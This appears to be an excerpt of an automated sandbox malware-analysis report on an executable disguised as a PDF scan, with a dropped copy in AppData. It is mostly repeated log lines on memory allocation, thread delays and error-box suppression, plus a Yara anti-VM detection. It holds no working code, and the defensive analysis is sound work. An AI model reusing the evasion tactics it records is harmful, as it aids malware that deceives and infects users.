Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeSBxb.exe PID: 6708, type: MEMORYSTR

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Memory allocated: 31D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Memory allocated: 3260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Memory allocated: 5260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Memory allocated: 9A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Memory allocated: 8E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Memory allocated: AA60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Memory allocated: BA60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Memory allocated: C410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Memory allocated: D410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Memory allocated: E410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Memory allocated: 1520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Memory allocated: 3190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Memory allocated: 2FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Memory allocated: 2C80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Memory allocated: 2CF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Memory allocated: 8CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Memory allocated: 9CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Memory allocated: 9EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Memory allocated: AEB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Memory allocated: B9D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Memory allocated: C9D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Memory allocated: 1380000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Memory allocated: 2E50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Memory allocated: 1380000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 599653	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 599211	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 598806	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 598680	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 598466	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Thread delayed: delay time: 594235	Jump to behavior
